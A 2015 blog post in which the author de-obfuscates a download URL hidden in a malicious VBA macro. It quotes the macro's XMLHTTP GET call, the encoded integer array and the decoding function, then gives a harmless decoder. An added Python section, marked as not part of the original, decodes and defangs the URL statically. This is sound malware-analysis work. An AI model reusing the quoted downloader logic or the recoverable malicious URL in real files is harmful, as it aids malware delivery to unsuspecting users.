Tuesday, November 10, 2015

De-Obfuscate URL from Evil VBA Macro

Here's a quick run-down of how I manually de-obfuscated a URL from an evil VBA macro.

First I was looking at this evil VBA macro, but it's obfuscated and difficult to determine what it's doing. After crawling through the VBA for a bit I noticed this line:

Set jsonParseString = CreateObject(M_Zorro + "icrosoft" + dot_hero + "XMLHTTP")

Which looks like it's trying to create an ActiveX object to browse to a URL. A bit later I see this code:

jsonParseString.Open "G" + UCase(e_loadman) + "T", Redistribute(solov, 35), False
jsonParseString.Send


Which looks like they're going to Send a "GET" request with that XMLHTTP object to a website. Notice, though, that the URL is obfuscated: it's just a function call, Redistribute(solov, 35). So I look a little higher and see that 'solov' is an array of integers (probably representing the characters of the URL):

solov = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)

And then I see that Redistribute is a function that likely converts those integers back into the actual URL:

Public Function Redistribute(Z() As Variant, oldLen As Integer) As String
  Dim n As Integer
  For n = LBound(Z) To UBound(Z)
    Redistribute = Redistribute & Chr(Z(n) - 8 * oldLen - 4444)
  Next n
End Function


Now I'm lazy, and I don't want to read or understand the evil code. I just want to "safely" run it. So I rip out only the necessary code, rename a few variables so it makes more sense to me, add a MsgBox to the end of the code, drop it into an empty Microsoft Word document's Document_Open routine, and boom, I have my URL.

Private Sub Document_Open()
  ' Only the decoding logic from the macro, with the variables renamed; no XMLHTTP object is created.
  Dim oldLen As Integer
  oldLen = 35
  Dim decodeURLFunction As String
  Dim encodedUrl() As Variant
  encodedUrl = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)
  Dim n As Integer
  For n = LBound(encodedUrl) To UBound(encodedUrl)
    decodeURLFunction = decodeURLFunction & Chr(encodedUrl(n) - 8 * oldLen - 4444)
  Next n
  MsgBox decodeURLFunction
End Sub

Of course, always do this in a lab (a safe environment). Make sure the code you cut & paste doesn't contain calls to the actual ActiveX objects, because then evil things may happen on your lab box. Instead, make sure it's only a bunch of string concatenation, character conversions, etc., and then add a MsgBox to pop up a message box with the information you wanted.
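The same decoding can be done without running any VBA at all, which removes the risk that a pasted line still does something live. The following is an added example, not code from the original post: it pulls the Array(...) literal and the Redistribute(name, oldLen) call out of the macro text with regular expressions, applies the same Chr(x - 8 * oldLen - 4444) arithmetic as the Redistribute function above, refuses to accept a result that is not printable ASCII (a sign that the constants or the array were mis-copied), and defangs the result for a report. The regex patterns, function names and the defanging style are my own; the constants 8 and 4444 and the array values are taken from the macro as shown on this page.

```python
import re

# Constructed input: just the two relevant lines copied from the macro above.
MACRO_SNIPPET = r'''
solov = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)
jsonParseString.Open "G" + UCase(e_loadman) + "T", Redistribute(solov, 35), False
'''

# name = Array(1, 2, 3)   -> captures the variable name and the integer list
ARRAY_RE = re.compile(r'(\w+)\s*=\s*Array\(([^)]*)\)')
# Redistribute(name, 35)  -> captures the array name and the oldLen argument
CALL_RE = re.compile(r'Redistribute\((\w+),\s*(\d+)\)')


def extract_arrays(vba: str) -> dict:
    """Map every 'name = Array(...)' literal in the macro text to a list of ints."""
    arrays = {}
    for name, body in ARRAY_RE.findall(vba):
        arrays[name] = [int(v) for v in body.split(",") if v.strip()]
    return arrays


def extract_calls(vba: str) -> list:
    """Return (array_name, oldLen) for every Redistribute(...) call site."""
    return [(name, int(old_len)) for name, old_len in CALL_RE.findall(vba)]


def redistribute(values: list, old_len: int) -> str:
    """Static re-implementation of the macro's Redistribute: Chr(Z(n) - 8*oldLen - 4444).

    VBA's Chr() agrees with ASCII below 128, so a correct decode must land in the
    printable range; anything else means the key or the array is wrong, so fail loudly
    rather than return garbage that might be mistaken for a real URL.
    """
    out = []
    for v in values:
        code = v - 8 * old_len - 4444
        if not 0x20 <= code <= 0x7E:
            raise ValueError(f"value {v} decodes to code point {code}, not printable ASCII")
        out.append(chr(code))
    return "".join(out)


def defang(url: str) -> str:
    """Make the decoded indicator safe to paste into a report or ticket."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def decode_urls(vba: str) -> list:
    """Resolve every Redistribute(array, oldLen) call to (array_name, url, defanged_url)."""
    arrays = extract_arrays(vba)
    results = []
    for name, old_len in extract_calls(vba):
        if name not in arrays:
            continue  # call refers to an array we did not capture; nothing to decode
        url = redistribute(arrays[name], old_len)
        results.append((name, url, defang(url)))
    return results


if __name__ == "__main__":
    for name, url, safe in decode_urls(MACRO_SNIPPET):
        print(f"{name}: {safe}")
```

Because the decoder never instantiates an ActiveX object or touches the network, it can be run on a normal analysis workstation against the raw macro text extracted from the document; the printable-ASCII check is what catches a mis-transcribed oldLen, since the wrong key shifts every character out of range rather than producing a plausible-looking string.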



Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1 comment:

  1. I would like to thank you for the efforts you have made in writing this article. I am hoping the same best work from you in the future as well. Thanks...
    visual basic course london
